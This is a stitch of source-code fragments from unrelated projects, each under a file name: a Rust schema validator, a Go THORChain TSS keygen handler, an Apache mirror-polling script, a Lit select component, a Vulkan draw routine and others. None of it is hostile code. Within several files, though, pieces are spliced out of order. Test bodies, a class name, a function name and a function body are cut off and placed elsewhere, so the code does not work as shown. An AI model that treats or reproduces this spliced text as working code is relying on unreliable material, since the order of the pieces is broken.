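    return int(whole) * FACTOR + int(frac)

a = to_significand("123.45")   # 12345
b = to_significand("1.55")     # 155
total = a + b                  # 12500 -- plain integer addition
print(f"{total // FACTOR}.{total % FACTOR:0{SCALE}d}")  # 125.00
```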
schema.rs
use crate::error::Error; use serde::Deserialize; use std::fmt::{Display, Formatter}; #[derive(Debug, Deserialize, Eq, PartialEq, Clone)] pub struct Schema { pub regex: String, pub filename: String, pub table: String, pub columns: Vec<Column>, } impl Schema { /// Ensures /// - only strings can be multiline enabled /// - only one multiline column allowed fn validate(&self) -> Result<(), Error> { let mut multiline_enabled = false; for column in &self.columns { if column.multiline && column.r#type != ColumnType::String { return Err(Error::InvalidMultilineType( column.name.clone(), column.r#type, )); } if column.multiline { if multiline_enabled { // found more than one multiline column let columns = self .columns .iter() .filter(|col| col.multiline) .map(|col| col.name.clone()) .collect(); return Err(Error::TooManyMultilineColumns(columns)); } else { multiline_enabled = true; } } } Ok(()) } } impl TryFrom<&str> for Schema { type Error = Error; fn try_from(value: &str) -> Result<Self, Self::Error> { let schema: Schema = serde_yaml::from_str(value)?; schema.validate()?; Ok(schema) } } #[derive(Debug, Deserialize, Eq, PartialEq, Clone)] pub struct Column { pub name: String, pub r#type: ColumnType, #[serde(default)] pub multiline: bool, } #[cfg(test)] impl Column { /// Creates a column definition pub fn new(name: impl Into<String>, column_type: ColumnType) -> Column { Column { name: name.into(), r#type: column_type, multiline: false, } } /// Creates a multiline string definition pub fn multiline_string(name: impl Into<String>) -> Column { Column { name: name.into(), r#type: ColumnType::String, multiline: true, } } } #[derive(Debug, Deserialize, Eq, PartialEq, Copy, Clone)] pub enum ColumnType { #[serde(alias = "string")] String, #[serde(alias = "i32")] Int32, #[serde(alias = "i64")] Int64, #[serde(alias = "bool")] Bool, #[serde(alias = "f32")] Float, #[serde(alias = "f64")] Double, #[serde(alias = "datetime")] DateTime, } impl Display for ColumnType { fn fmt(&self, f: &mut Formatter<'_>) -> std::fmt::Result { let value = match self { ColumnType::String => "string", ColumnType::Int32 => "i32", ColumnType::Int64 => "i64", ColumnType::Bool => "bool", ColumnType::Float => "f32", ColumnType::Double => "f64", ColumnType::DateTime => "datetime", }; f.write_str(&value) } } #[cfg(test)] mod tests { use super::*; #[test] fn parse_schema() { let raw = " regex: '*' filename: .* table: logs columns: - name: string type: string multiline: true - name: i32 type: i32 - name: i64 type: i64 - name: bool type: bool - name: f32 type: f32 - name: f64 type: f64 - name: datetime type: datetime "; let schema = Schema::try_from(raw).unwrap(); let expected = Schema { regex: "*".to_string(), filename: ".*".to_string(), table: "logs".to_string(), columns: vec![ Column::multiline_string("string"), Column::new("i32", ColumnType::Int32), Column::new("i64", ColumnType::Int64), Column::new("bool", ColumnType::Bool), Column::new("f32", ColumnType::Float), Column::new("f64", ColumnType::Double), Column::new("datetime", ColumnType::DateTime), ], }; assert_eq!(expected, schema); } #[test] fn parse_invalid_multiline()
#[test] fn parse_invalid_multiple_multiline() { let raw = " regex: '*' filename: .* table: logs columns: - name: string1 type: string multiline: true - name: string2 type: string multiline: true "; let schema = Schema::try_from(raw); assert!(schema.is_err()); if let Err(Error::TooManyMultilineColumns(columns)) = schema { assert_eq!( columns, vec![String::from("string1"), String::from("string2")] ); } else { panic!( "Error should be Error::TooManyMultilineColumns. Actual error: {:?}", schema.unwrap_err() ); } } }
{ let cases = [ ("i32", ColumnType::Int32), ("i64", ColumnType::Int64), ("bool", ColumnType::Bool), ("f32", ColumnType::Float), ("f64", ColumnType::Double), ("datetime", ColumnType::DateTime), ]; for case in cases { let raw = format!( " regex: '*' filename: .* table: logs columns: - name: string type: string - name: {} type: {} multiline: true ", case.0, case.0 ); let schema = Schema::try_from(raw.as_str()); assert!(schema.is_err()); if let Err(Error::InvalidMultilineType(name, r#type)) = schema { assert_eq!(case.0.to_owned(), name); assert_eq!(case.1, r#type); } else { panic!( "Error should be Error::InvalidMultilineType. Actual error: {:?}", schema.unwrap_err() ); } } }
handler_tss.go
package thorchain import ( "fmt" "github.com/armon/go-metrics" "github.com/blang/semver" "github.com/cosmos/cosmos-sdk/telemetry" "gitlab.com/thorchain/thornode/common" "gitlab.com/thorchain/thornode/common/cosmos" "gitlab.com/thorchain/thornode/constants" ) // TssHandler handle MsgTssPool type TssHandler struct { mgr Manager } // NewTssHandler create a new handler to process MsgTssPool func NewTssHandler(mgr Manager) TssHandler { return TssHandler{ mgr: mgr, } } // Run is the main entry for TssHandler func (h TssHandler) Run(ctx cosmos.Context, m cosmos.Msg) (*cosmos.Result, error) { msg, ok := m.(*MsgTssPool) if !ok { return nil, errInvalidMessage } err := h.validate(ctx, *msg) if err != nil { ctx.Logger().Error("msg_tss_pool failed validation", "error", err) return nil, err } result, err := h.handle(ctx, *msg) if err != nil { ctx.Logger().Error("failed to process MsgTssPool", "error", err) return nil, err } return result, err } func (h TssHandler) validate(ctx cosmos.Context, msg MsgTssPool) error { version := h.mgr.GetVersion() if version.GTE(semver.MustParse("0.71.0")) { return h.validateV71(ctx, msg) } else if version.GTE(semver.MustParse("0.68.0")) { return h.validateV68(ctx, msg) } else if version.GTE(semver.MustParse("0.1.0")) { return h.validateV1(ctx, msg) } return errBadVersion } func (h TssHandler) validateV71(ctx cosmos.Context, msg MsgTssPool) error { if err := msg.ValidateBasic(); err != nil { return err } newMsg, err := NewMsgTssPool(msg.PubKeys, msg.PoolPubKey, msg.KeygenType, msg.Height, msg.Blame, msg.Chains, msg.Signer, msg.KeygenTime) if err != nil { return fmt.Errorf("fail to recreate MsgTssPool,err: %w", err) } if msg.ID != newMsg.ID { return cosmos.ErrUnknownRequest("invalid tss message") } churnRetryBlocks := h.mgr.GetConstants().GetInt64Value(constants.ChurnRetryInterval) if msg.Height <= common.BlockHeight(ctx)-churnRetryBlocks { return cosmos.ErrUnknownRequest("invalid keygen block") } keygenBlock, err := h.mgr.Keeper().GetKeygenBlock(ctx, msg.Height) if err != nil { return fmt.Errorf("fail to get keygen block from data store: %w", err) } for _, keygen := range keygenBlock.Keygens { keyGenMembers := keygen.GetMembers() if !msg.GetPubKeys().Equals(keyGenMembers) { continue } // Make sure the keygen type are consistent if msg.KeygenType != keygen.Type { continue } for _, member := range keygen.GetMembers() { addr, err := member.GetThorAddress() if err == nil && addr.Equals(msg.Signer) { return h.validateSigner(ctx, msg.Signer) } } } return cosmos.ErrUnauthorized("not authorized") } func (h TssHandler) validateSigner(ctx cosmos.Context, signer cosmos.AccAddress) error { nodeSigner, err := h.mgr.Keeper().GetNodeAccount(ctx, signer) if err != nil { return fmt.Errorf("invalid signer") } if nodeSigner.IsEmpty() { return fmt.Errorf("invalid signer") } if nodeSigner.Status != NodeActive && nodeSigner.Status != NodeReady { return fmt.Errorf("invalid signer status(%s)", nodeSigner.Status) } // ensure we have enough rune minBond, err := h.mgr.Keeper().GetMimir(ctx, constants.MinimumBondInRune.String()) if minBond < 0 || err != nil { minBond = h.mgr.GetConstants().GetInt64Value(constants.MinimumBondInRune) } if nodeSigner.Bond.LT(cosmos.NewUint(uint64(minBond))) { return fmt.Errorf("signer doesn't have enough rune") } return nil } func (h TssHandler) handle(ctx cosmos.Context, msg MsgTssPool) (*cosmos.Result, error) { ctx.Logger().Info("handleMsgTssPool request", "ID:", msg.ID) version := h.mgr.GetVersion() if version.GTE(semver.MustParse("0.73.0")) { return 
h.handleV73(ctx, msg) } else if version.GTE(semver.MustParse("0.68.0")) { return h.handleV68(ctx, msg) } else if version.GTE(semver.MustParse("0.1.0")) { return h.handleV1(ctx, msg) } return nil, errBadVersion } func (h TssHandler) handleV73(ctx cosmos.Context, msg MsgTssPool) (*cosmos.Result, error) { ctx.Logger().Info("handler tss", "current version", h.mgr.GetVersion()) if !msg.Blame.IsEmpty() { ctx.Logger().Error(msg.Blame.String()) } // only record TSS metric when keygen is success if msg.IsSuccess() && !msg.PoolPubKey.IsEmpty() { metric, err := h.mgr.Keeper().GetTssKeygenMetric(ctx, msg.PoolPubKey) if err != nil { ctx.Logger().Error("fail to get keygen metric", "error", err) } else { ctx.Logger().Info("save keygen metric to db") metric.AddNodeTssTime(msg.Signer, msg.KeygenTime) h.mgr.Keeper().SetTssKeygenMetric(ctx, metric) } } voter, err := h.mgr.Keeper().GetTssVoter(ctx, msg.ID) if err != nil { return nil, fmt.Errorf("fail to get tss voter: %w", err) } // when PoolPubKey is empty , which means TssVoter with id(msg.ID) doesn't // exist before, this is the first time to create it // set the PoolPubKey to the one in msg, there is no reason voter.PubKeys // have anything in it either, thus override it with msg.PubKeys as well if voter.PoolPubKey.IsEmpty() { voter.PoolPubKey = msg.PoolPubKey voter.PubKeys = msg.PubKeys } // voter's pool pubkey is the same as the one in messasge if !voter.PoolPubKey.Equals(msg.PoolPubKey) { return nil, fmt.Errorf("invalid pool pubkey") } observeSlashPoints := h.mgr.GetConstants().GetInt64Value(constants.ObserveSlashPoints) observeFlex := h.mgr.GetConstants().GetInt64Value(constants.ObservationDelayFlexibility) h.mgr.Slasher().IncSlashPoints(ctx, observeSlashPoints, msg.Signer) if !voter.Sign(msg.Signer, msg.Chains) { ctx.Logger().Info("signer already signed MsgTssPool", "signer", msg.Signer.String(), "txid", msg.ID) return &cosmos.Result{}, nil } h.mgr.Keeper().SetTssVoter(ctx, voter) // doesn't have 2/3 majority consensus yet if !voter.HasConsensus() { return &cosmos.Result{}, nil } // when keygen success if msg.IsSuccess() { h.judgeLateSigner(ctx, msg, voter) if !voter.HasCompleteConsensus() { return &cosmos.Result{}, nil } } if voter.BlockHeight == 0 { voter.BlockHeight = common.BlockHeight(ctx) h.mgr.Keeper().SetTssVoter(ctx, voter) h.mgr.Slasher().DecSlashPoints(ctx, observeSlashPoints, voter.GetSigners()...) if msg.IsSuccess() { vaultType := YggdrasilVault
if msg.KeygenType == AsgardKeygen { vaultType = AsgardVault } chains := voter.ConsensusChains() vault := NewVault(common.BlockHeight(ctx), InitVault, vaultType, voter.PoolPubKey, chains.Strings(), h.mgr.Keeper().GetChainContracts(ctx, chains)) vault.Membership = voter.PubKeys if err := h.mgr.Keeper().SetVault(ctx, vault); err != nil { return nil, fmt.Errorf("fail to save vault: %w", err) } keygenBlock, err := h.mgr.Keeper().GetKeygenBlock(ctx, msg.Height) if err != nil { return nil, fmt.Errorf("fail to get keygen block, err: %w, height: %d", err, msg.Height) } initVaults, err := h.mgr.Keeper().GetAsgardVaultsByStatus(ctx, InitVault) if err != nil { return nil, fmt.Errorf("fail to get init vaults: %w", err) } if len(initVaults) == len(keygenBlock.Keygens) { for _, v := range initVaults { v.UpdateStatus(ActiveVault, common.BlockHeight(ctx)) if err := h.mgr.Keeper().SetVault(ctx, v); err != nil { return nil, fmt.Errorf("fail to save vault: %w", err) } if err := h.mgr.VaultMgr().RotateVault(ctx, v); err != nil { return nil, fmt.Errorf("fail to rotate vault: %w", err) } } } else { ctx.Logger().Info("not enough keygen yet", "expecting", len(keygenBlock.Keygens), "current", len(initVaults)) } metric, err := h.mgr.Keeper().GetTssKeygenMetric(ctx, msg.PoolPubKey) if err != nil { ctx.Logger().Error("fail to get keygen metric", "error", err) } else { var total int64 for _, item := range metric.NodeTssTimes { total += item.TssTime } evt := NewEventTssKeygenMetric(metric.PubKey, metric.GetMedianTime()) if err := h.mgr.EventMgr().EmitEvent(ctx, evt); err != nil { ctx.Logger().Error("fail to emit tss metric event", "error", err) } } } else { // if a node fail to join the keygen, thus hold off the network // from churning then it will be slashed accordingly slashPoints := h.mgr.GetConstants().GetInt64Value(constants.FailKeygenSlashPoints) totalSlash := cosmos.ZeroUint() for _, node := range msg.Blame.BlameNodes { nodePubKey, err := common.NewPubKey(node.Pubkey) if err != nil { return nil, ErrInternal(err, fmt.Sprintf("fail to parse pubkey(%s)", node.Pubkey)) } na, err := h.mgr.Keeper().GetNodeAccountByPubKey(ctx, nodePubKey) if err != nil { return nil, fmt.Errorf("fail to get node from it's pub key: %w", err) } if na.Status == NodeActive { if err := h.mgr.Keeper().IncNodeAccountSlashPoints(ctx, na.NodeAddress, slashPoints); err != nil { ctx.Logger().Error("fail to inc slash points", "error", err) } else { telemetry.IncrCounterWithLabels( []string{"thornode", "point_slash"}, float32(slashPoints), []metrics.Label{ telemetry.NewLabel("address", na.NodeAddress.String()), telemetry.NewLabel("reason", "failed_keygen"), }, ) } if err := h.mgr.EventMgr().EmitEvent(ctx, NewEventSlashPoint(na.NodeAddress, slashPoints, "fail keygen")); err != nil { ctx.Logger().Error("fail to emit slash point event") } } else { // go to jail jailTime := h.mgr.GetConstants().GetInt64Value(constants.JailTimeKeygen) releaseHeight := common.BlockHeight(ctx) + jailTime reason := "failed to perform keygen" if err := h.mgr.Keeper().SetNodeAccountJail(ctx, na.NodeAddress, releaseHeight, reason); err != nil { ctx.Logger().Error("fail to set node account jail", "node address", na.NodeAddress, "reason", reason, "error", err) } // take out bond from the node account and add it to vault bond reward RUNE // thus good behaviour node will get reward reserveVault, err := h.mgr.Keeper().GetNetwork(ctx) if err != nil { return nil, fmt.Errorf("fail to get reserve vault: %w", err) } slashBond := 
reserveVault.CalcNodeRewards(cosmos.NewUint(uint64(slashPoints))) if slashBond.GT(na.Bond) { slashBond = na.Bond } ctx.Logger().Info("fail keygen , slash bond", "address", na.NodeAddress, "amount", slashBond.String()) na.Bond = common.SafeSub(na.Bond, slashBond) totalSlash = totalSlash.Add(slashBond) coin := common.NewCoin(common.RuneNative, slashBond) if !coin.Amount.IsZero() { if err := h.mgr.Keeper().SendFromModuleToModule(ctx, BondName, ReserveName, common.NewCoins(coin)); err != nil { return nil, fmt.Errorf("fail to transfer funds from bond to reserve: %w", err) } } } if err := h.mgr.Keeper().SetNodeAccount(ctx, na); err != nil { return nil, fmt.Errorf("fail to save node account: %w", err) } tx := common.Tx{} tx.ID = common.BlankTxID tx.FromAddress = na.BondAddress bondEvent := NewEventBond(totalSlash, BondCost, tx) if err := h.mgr.EventMgr().EmitEvent(ctx, bondEvent); err != nil { return nil, fmt.Errorf("fail to emit bond event: %w", err) } } } return &cosmos.Result{}, nil } if (voter.BlockHeight + observeFlex) >= common.BlockHeight(ctx) { h.mgr.Slasher().DecSlashPoints(ctx, observeSlashPoints, msg.Signer) } return &cosmos.Result{}, nil } func (h TssHandler) judgeLateSigner(ctx cosmos.Context, msg MsgTssPool, voter TssVoter) { // if the voter doesn't reach 2/3 majority consensus , this method should not take any actions if !voter.HasConsensus() || !msg.IsSuccess() { return } slashPoints := h.mgr.GetConstants().GetInt64Value(constants.FailKeygenSlashPoints) // when voter already has 2/3 majority signers , restore current message signer's slash points if voter.MajorityConsensusBlockHeight > 0 { h.mgr.Slasher().DecSlashPoints(ctx, slashPoints, msg.Signer) if err := h.mgr.Keeper().ReleaseNodeAccountFromJail(ctx, msg.Signer); err != nil { ctx.Logger().Error("fail to release node account from jail", "node address", msg.Signer, "error", err) } return } voter.MajorityConsensusBlockHeight = common.BlockHeight(ctx) h.mgr.Keeper().SetTssVoter(ctx, voter) for _, member := range msg.PubKeys { pkey, err := common.NewPubKey(member) if err != nil { ctx.Logger().Error("fail to get pub key", "error", err) continue } thorAddr, err := pkey.GetThorAddress() if err != nil { ctx.Logger().Error("fail to get thor address", "error", err) continue } // whoever is in the keygen list , but didn't broadcast MsgTssPool if !voter.HasSigned(thorAddr) { h.mgr.Slasher().IncSlashPoints(ctx, slashPoints, thorAddr) // go to jail jailTime := h.mgr.GetConstants().GetInt64Value(constants.JailTimeKeygen) releaseHeight := common.BlockHeight(ctx) + jailTime reason := "failed to vote keygen in time" if err := h.mgr.Keeper().SetNodeAccountJail(ctx, thorAddr, releaseHeight, reason); err != nil { ctx.Logger().Error("fail to set node account jail", "node address", thorAddr, "reason", reason, "error", err) } } } }
models.rs
use serde::{Deserialize, Serialize}; use uuid::Uuid; #[derive(Serialize, Deserialize, Debug)] pub struct Episode { pub uuid: Option<Uuid>, pub title: String, pub episode: i16, pub season: Option<i16>, pub description: String,
}
poll-mirrors.py
#!/usr/bin/env python3 # # vim: softtabstop=2 shiftwidth=2 expandtab # # Python port of poll-mirrors.pl # # This script is designed to poll download sites after posting a release # and print out notice as each becomes available. The RM can use this # script to delay the release announcement until the release can be # downloaded. # # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import argparse import datetime import ftplib import re import sys import time from urllib.parse import urlparse from multiprocessing import Pool import http.client as http def p(s): sys.stdout.write(s) sys.stdout.flush() def mirror_contains_file(url): url = urlparse(url) if url.scheme == 'https': return https_file_exists(url) elif url.scheme == 'http': return http_file_exists(url) elif url.scheme == 'ftp': return ftp_file_exists(url) def http_file_exists(url): exists = False try: conn = http.HTTPConnection(url.netloc) conn.request('HEAD', url.path) response = conn.getresponse() exists = response.status == 200 except: pass return exists def https_file_exists(url): exists = False try: conn = http.HTTPSConnection(url.netloc) conn.request('HEAD', url.path) response = conn.getresponse() exists = response.status == 200 except: pass return exists def ftp_file_exists(url): listing = [] try: conn = ftplib.FTP(url.netloc) conn.login() listing = conn.nlst(url.path) conn.quit() except Exception as e: pass return len(listing) > 0 def check_mirror(url):
if __name__ == '__main__': desc = 'Periodically checks that all Solr mirrors contain either a copy of a release or a specified path' parser = argparse.ArgumentParser(description=desc) parser.add_argument('-version', '-v', help='Solr Operator version to check') parser.add_argument('-path', '-p', help='instead of a versioned release, check for some/explicit/path') parser.add_argument('-interval', '-i', help='seconds to wait before re-querying mirrors', type=int, default=300) parser.add_argument('-once', '-o', help='run only once', action='store_true', default=False) args = parser.parse_args() if (args.version is None and args.path is None) \ or (args.version is not None and args.path is not None): p('You must specify either -version or -path but not both!\n') sys.exit(1) try: conn = http.HTTPSConnection('www.apache.org') conn.request('GET', '/mirrors/') response = conn.getresponse() html = response.read() except Exception as e: p('Unable to fetch the Apache mirrors list!\n') sys.exit(1) mirror_path = args.path if args.path is not None else 'solr/solr-operator/{}/solr-operator-{}.tgz'.format(args.version, args.version) pending_mirrors = [] for match in re.finditer('<TR>(.*?)</TR>', str(html), re.MULTILINE | re.IGNORECASE | re.DOTALL): row = match.group(1) if not '<TD>ok</TD>' in row: # skip bad mirrors continue match = re.search('<A\s+HREF\s*=\s*"([^"]+)"\s*>', row, re.MULTILINE | re.IGNORECASE) if match: pending_mirrors.append(match.group(1) + mirror_path) total_mirrors = len(pending_mirrors) label = args.version if args.version is not None else args.path while True: p('\n{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())) p('\nPolling {} Apache Mirrors'.format(len(pending_mirrors))) p('...\n') start = time.time() with Pool(processes=5) as pool: pending_mirrors = list(filter(lambda x: x is not None, pool.map(check_mirror, pending_mirrors))) stop = time.time() remaining = args.interval - (stop - start) available_mirrors = total_mirrors - len(pending_mirrors) p('\n{} is downloadable from {}/{} Apache Mirrors ({:.2f}%)\n' .format(label, available_mirrors, total_mirrors, available_mirrors * 100 / (1 if total_mirrors == 0 else total_mirrors) )) if len(pending_mirrors) == 0 or args.once == True: break if remaining > 0: p('Sleeping for {:d} seconds...\n'.format(int(remaining + 0.5))) time.sleep(remaining)
if mirror_contains_file(url): p('.') return None else: # p('\nFAIL: ' + url + '\n') p('X') return url
flow-select.js
import {BaseElement, html, css, dpc} from './base-element.js'; import {FlowMenu} from './flow-menu.js'; /** * @export * @class FlowSelect * @extends {FlowMenu} * @cssvar {font-family} [--flow-font-family="Julius Sans One"] * @cssvar {font-size} [--flow-select-font-size-label=0.7rem] * @cssvar {font-weight} [--flow-input-font-weight=400] * @cssvar {font-size} [--flow-input-font-size=1rem] * @cssvar {height} [--flow-select-input-height] * @cssvar {line-height} [--flow-input-line-heigh=1.2] * @cssvar {min-height} [--flow-select-selected-min-height=44px] * @cssvar {min-width} [--flow-select-selected-min-width=100px] * @cssvar {max-width} [--flow-select-selected-max-width=500px] * @cssvar {background-color} [--flow-input-bg=inherit] * @cssvar {border} [--flow-select-border-label=2px solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1)))] * @cssvar {border} [--flow-select-border=2px solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1)))] * @cssvar {color} [--flow-input-color=inherit] * @cssvar {color} [--flow-input-placeholder=#888] * @cssvar {padding} [--flow-select-padding-label=2px 5px] * @cssvar {padding} [--flow-select-padding=5px] * @cssvar {margin} [--flow-select-filter-input-margin=0px 0px 5px] * @cssvar {color} [--flow-select-trigger-bg=transparent] * @cssvar {color} [--flow-select-trigger-color= var(--flow-color, #000)] * @cssvar {padding} [--flow-select-trigger-padding=0px] * @cssvar {color} [--flow-select-trigger-hover-bg=transparent] * @cssvar {color} [--flow-select-trigger-hover-color=var(--flow-dropdown-trigger-color)] * @cssvar {height} [--flow-select-trigger-line-height=1] * @cssvar {margin} [--flow-select-input-margin=0px] * @example * <flow-select label="menu" selected="0"> * <flow-menu-item value="0">Menu Item 1</flow-menu-item> * <flow-menu-item value="1">Menu Item 2</flow-menu-item> * </flow-select> */ export class
extends FlowMenu { static get properties() { return { label:{type:String}, textAttr:{type:String}, showfilter:{type:Boolean}, filterText:{type:String}, searchIcon:{type:String}, disabled:{type:Boolean, reflect:true}, "right-align":{type:Boolean} } } static get styles() { return [super.styles, css` :host{ display:var(--flow-select-display, inline-block);vertical-align:middle; font-family:var(--flow-font-family, "Julius Sans One"); padding:var(--flow-select-padding, 0px); margin:var(--flow-select-margin, 5px); width:var(--flow-select-width); max-width:var(--flow-select-max-width, 100%); height:var(--flow-select-height); --flow-dropdown-border:var(--flow-select-dropdown-border, 1px solid var(--flow-primary-color, #000)); --flow-dropdown-trigger-bg:var(--flow-select-trigger-bg, transparent); --flow-dropdown-trigger-color:var(--flow-select-trigger-color, var(--flow-color, #000)); --flow-dropdown-trigger-padding:var(--flow-select-trigger-padding, 0px); --flow-dropdown-trigger-hover-bg:var(--flow-select-trigger-hover-bg, transparent); --flow-dropdown-trigger-hover-color:var(--flow-select-trigger-hover-color, var(--flow-dropdown-trigger-color)); --flow-dropdown-trigger-line-height:var(--flow-select-trigger-line-height, 1); --flow-dropdown-top:var(--flow-select-dropdown-border-top, -8px); --flow-dropdown-trigger-font-size:0px; } flow-dropdown{margin:0px;} .wrapper{ display:flex; align-items:stretch; min-width:50px; text-align:center; /*justify-content:center;*/ margin-top:var(--flow-select-wrapper-margin-top,-0.5rem); } label{ /*font-size:0.7rem; padding:2px 5px;*/ font-size:var(--flow-select-label-font-size, 0.7rem); padding:var(--flow-select-label-padding,2px 5px); /*border:2px solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1)));*/ border: var(--flow-select-label-border, 2px) solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1))); border-radius:8px; margin-left:var(--flow-select-label-margin-left,10px); z-index:1; position:relative;background-color:var(--flow-input-bg, inherit); font-weight:var(--flow-font-weight, bold); } .input{ flex:1;box-sizing:border-box; /*border:2px solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1)));*/ border: var(--flow-select-border, 2px) solid var(--flow-border-color, var(--flow-primary-color, rgba(0,151,115,1))); border-radius:var(--flow-select-input-border-radius, var(--flow-input-border-radius, 8px)); margin:var(--flow-select-input-margin, 0px); padding:var(--flow-select-input-padding,16px 30px 10px 10px); background-color:var(--flow-select-input-bg, var(--flow-input-bg, inherit)); color:var(--flow-input-color, inherit); font-size:var(--flow-input-font-size, 1rem); font-weight:var(--flow-input-font-weight, 400); line-height:var(--flow-input-line-height, 1.2); text-align:left; height:var(--flow-select-input-height); width:var(--flow-select-input-width); } .input:focus{outline:none} .input::-webkit-input-placeholder { color: var(--flow-input-placeholder, #888 ); } .selected{ min-width:var(--flow-select-selected-min-width, 100px); max-width:var(--flow-select-selected-max-width, 500px); min-height:var(--flow-select-selected-min-height, 44px); position:relative; box-shadow:var(--flow-input-box-shadow); height:var(--flow-select-selected-height); width:var(--flow-select-selected-width); overflow: hidden; text-overflow: ellipsis; } :host(:not([disabled])) .input.selected::after{ content:"";display:inline-block; position:absolute;right:10px; top:var(--flow-select-dropdown-arrow, calc(50% - 2px)); 
width:0px;height:0px; border:5px solid var(--flow-primary-color, #000); border-left-color:transparent; border-bottom-color:transparent; border-right-color:transparent; } flow-dropdown:not([multiple]) .input.selected{white-space:nowrap} .filter{ padding-top:10px;border-radius:3px; } .filter-box{ position:relative;display:flex;align-items:center; margin:var(--flow-select-filter-input-margin, 0px 0px 5px); } .filter-box[hidden]{display:none} .filter-box .clear-btn{ position:absolute;right:10px;cursor:pointer;display:none; font-size:1.5rem;color:var(--flow-input-color, inherit); } .filter-box input[has-content]+.clear-btn{display:inline-block} .filter-box input{ padding-left:30px; } .filter-box .icon{ width:15px;height:15px;fill:var(--flow-primary-color); position:absolute;left:10px; } .dd ::slotted([flow-select-filtred]){display:none} `]; } constructor(){ super(); this.textAttr = "data-text"; } render() { let iconSrc = this.iconPath(this.searchIcon || "search"); return html `<flow-dropdown ?multiple="${this.multiple}" ?disabled=${this.disabled} ?right-align=${this["right-align"]}> <div slot="trigger"> <label ?hidden=${!this.label}>${this.label||""}</label> <div class="wrapper" @click=${this.onClick}> <slot name="prefix"></slot> <div class="input selected"> ${this.renderSelected()}&nbsp; </div> <slot name="sufix"></slot> </div> </div><div class="dd"> <div class="filter-box" ?hidden=${!this.showfilter}> <svg class="icon"> <use href="${iconSrc}"></use> </svg> <input class="input filter" type="text" placeholder="${this.placeholder || 'Search...'}" ?has-content=${this.filterText} .value="${this.filterText||''}" @keyup=${this.onSearch} /> <a class="clear-btn" @click=${this.clearFilter}>&times;</a> </div> <div class="menu-list-container"> <slot class="menu-list"></slot> ${this.renderItems()} </div> </div> </flow-dropdown>`; } renderItems(){ return ''; } renderSelected(){ let map = new Map(); this.list.forEach(item=>{ let text = item.getAttribute(this.textAttr) || item.innerText; map.set(item.getAttribute(this.valueAttr), text) }) return this._selected.map(s=>html `<span class="item" value="${s}">${map.get(s) || s}</span>` ) } selectionChanged(){ super.selectionChanged(); if(!this.multiple && this.dropdown) this.dropdown.close(); } firstUpdated(){ super.firstUpdated(); if(this.classList.contains("right-align")) this["right-align"] = true; this.dropdown = this.renderRoot.querySelector("flow-dropdown"); let slot = this.renderRoot.querySelector('slot.menu-list'); this.listSlot = slot; slot.addEventListener('slotchange', (e)=>{ this.updateList(); }); this.parseSelected(); this.requestUpdate("_selected", []) } updateList(changes){ super.updateList(); if(!changes) this.requestUpdate("_selected", this._selected.slice(0)) } clearFilter(){ this.filterText = ""; this.filterList(""); } onSearch(e){ let text = e.target.value; this.filterText = text; this.debounce('onSearch', ()=>{ this.filterList(text); }, 200) } filterList(text){ const rg = new RegExp(`${text}`, 'i'); console.log("this.list", this.list); this.list.forEach(item=>{ let text = item.getAttribute(this.textAttr) || item.innerText; let value = item.getAttribute(this.valueAttr); if(!text || rg.test(value) || rg.test(text)){ item.removeAttribute('flow-select-filtred') }else{ item.setAttribute('flow-select-filtred', true) } }) } /* onWindowResize(){ this.updateDropdownSize(); } onParentScroll(){ this.updateDropdownSize(); } connectedCallback(){ super.connectedCallback(); } disconnectedCallback(){ super.disconnectedCallback(); } */ } 
FlowSelect.define('flow-select');
FlowSelect
draw.rs
use crate::utils; use ash::extensions::khr; use ash::version::DeviceV1_0; use ash::vk; pub fn
( device: &ash::Device, swapchain: vk::SwapchainKHR, queue: vk::Queue, active_resource_index: u32, command_pool: vk::CommandPool, active_command_buffers: &mut Vec<vk::CommandBuffer>, pipeline: vk::Pipeline, pipeline_layout: vk::PipelineLayout, pos_uv_desc_set: vk::DescriptorSet, render_pass: vk::RenderPass, framebuffers: &Vec<vk::Framebuffer>, surface_extent: vk::Extent2D, image_available_semaphore: vk::Semaphore, rendering_complete_semaphore: vk::Semaphore, fences: &Vec<vk::Fence>, swapchain_loader: &khr::Swapchain, scale: i32, ) -> Result<(), String> { let (image_index, _) = match unsafe { swapchain_loader.acquire_next_image( swapchain, u64::MAX, image_available_semaphore, vk::Fence::null(), ) } { Ok(index) => index, Err(_) => return Err(String::from("failed to acquire next image")), }; unsafe { let graphics_fence = fences[active_resource_index as usize]; let fences = [graphics_fence]; match device.wait_for_fences(&fences, true, u64::MAX) { Err(_) => { return Err(format!( "failed to wait for graphics fence {}", active_resource_index )) } _ => (), } let fences = [graphics_fence]; match device.reset_fences(&fences) { Err(_) => { return Err(format!( "failed to reset graphics fence {}", active_resource_index )) } _ => (), } { let command_buffer = active_command_buffers[active_resource_index as usize]; let buffers = [command_buffer]; device.free_command_buffers(command_pool, &buffers); let allocate_info = vk::CommandBufferAllocateInfo::builder() .command_pool(command_pool) .level(vk::CommandBufferLevel::PRIMARY) .command_buffer_count(1); let command_buffers = match device.allocate_command_buffers(&allocate_info) { Ok(buf) => buf, Err(_) => { return Err(format!( "failed to allocate command buffer fot active resource index {}", active_resource_index )) } }; active_command_buffers[active_resource_index as usize] = command_buffers[0]; } let command_buffer = active_command_buffers[active_resource_index as usize]; let begin_info = vk::CommandBufferBeginInfo::builder() .flags(vk::CommandBufferUsageFlags::ONE_TIME_SUBMIT); match device.begin_command_buffer(command_buffer, &begin_info) { Err(_) => return Err(String::from("failed to begin graphics command buffer")), _ => (), } let clear_color = vk::ClearColorValue { float32: [0.5f32, 0.1f32, 0.1f32, 0.1f32], }; let clear_values = vec![vk::ClearValue { color: clear_color }]; let render_pass_begin_info = vk::RenderPassBeginInfo::builder() .render_pass(render_pass) .framebuffer(framebuffers[image_index as usize]) 